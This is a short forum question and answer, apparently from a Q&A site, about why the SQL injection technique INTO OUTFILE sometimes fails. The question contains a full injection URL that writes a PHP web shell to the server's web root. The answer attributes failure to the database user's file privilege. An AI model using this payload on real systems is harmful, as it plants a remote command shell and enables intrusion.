# Why does the SQL Injection technique INTO OUTFILE sometimes not work?

Tags: php, sql-injection

Why does the SQL Injection technique `INTO OUTFILE` sometimes not work?

`http://example.com/file.php?id=1 union select 1,"<?php system($_REQUEST['cmd'])?>",3,4 INTO OUTFILE " /var/www/website/public_html/shell.php"`

Is there any workaround for this when it doesn't?

Answer (score 3):

It depends on the privileges the dbuser has. If there's no file privilege, into outfile just doesn't work. No bypass for that.

Comment: and why should users have privileges ?